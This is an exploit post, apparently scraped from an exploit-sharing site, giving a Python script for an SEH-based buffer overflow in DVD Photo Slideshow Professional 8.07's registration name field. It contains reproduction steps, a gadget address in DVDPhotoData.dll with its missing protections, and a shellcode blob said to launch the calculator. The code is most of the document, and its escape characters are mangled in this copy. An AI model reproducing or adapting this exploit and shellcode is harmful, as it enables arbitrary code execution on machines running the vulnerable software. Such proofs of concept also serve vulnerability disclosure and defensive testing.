#Exploit Title: DVD Photo Slideshow Professional 8.07 – ‘Name’ Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name “name.txt”.
#2. Just copy the text inside “name.txt”.
#3. Start the program. In the new window click “Help” > “Register …
#4. Now paste the content of “name.txt” into the field: “Registration Name” > Click “Ok”
#5. The calculator runs successfully


#!/usr/bin/python

from struct import pack

buffer = “x41” * 256
nseh = “xebx06xffxff”
seh = pack(“<I”,0x1004bb51)
#0x1004bb51 : pop edi # pop esi # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:Program FilesDVD Photo Slideshow ProfessionalDVDPhotoData.dll)
long_buffer = “x44” * 600
shellcode = “”
shellcode += “xdbxcexbfx90x28x2fx09xd9x74x24xf4x5dx29″
shellcode += “xc9xb1x31x31x7dx18x83xc5x04x03x7dx84xca”
shellcode += “xdaxf5x4cx88x25x06x8cxedxacxe3xbdx2dxca”
shellcode += “x60xedx9dx98x25x01x55xccxddx92x1bxd9xd2″
shellcode += “x13x91x3fxdcxa4x8ax7cx7fx26xd1x50x5fx17″
shellcode += “x1axa5x9ex50x47x44xf2x09x03xfbxe3x3ex59″
shellcode += “xc0x88x0cx4fx40x6cxc4x6ex61x23x5fx29xa1″
shellcode += “xc5x8cx41xe8xddxd1x6cxa2x56x21x1ax35xbf”
shellcode += “x78xe3x9axfexb5x16xe2xc7x71xc9x91x31x82″
shellcode += “x74xa2x85xf9xa2x27x1ex59x20x9fxfax58xe5″
shellcode += “x46x88x56x42x0cxd6x7ax55xc1x6cx86xdexe4″
shellcode += “xa2x0fxa4xc2x66x54x7ex6ax3ex30xd1x93x20″
shellcode += “x9bx8ex31x2ax31xdax4bx71x5fx1dxd9x0fx2d”
shellcode += “x1dxe1x0fx01x76xd0x84xcex01xedx4exabxee”
shellcode += “x0fx5bxc1x86x89x0ex68xcbx29xe5xaexf2xa9″
shellcode += “x0cx4ex01xb1x64x4bx4dx75x94x21xdex10x9a”
shellcode += “x96xdfx30xf9x79x4cxd8xd0x1cxf4x7bx2d”

payload = buffer + nseh + seh + shellcode + long_buffer
try:
f=open(“name.txt”,”w”)
print “[+] Creating %s bytes evil payload..” %len(payload)
f.write(payload)
f.close()
print “[+] File created!”
except:
print “File cannot be created”





Source link

Write a comment:
*

Your email address will not be published.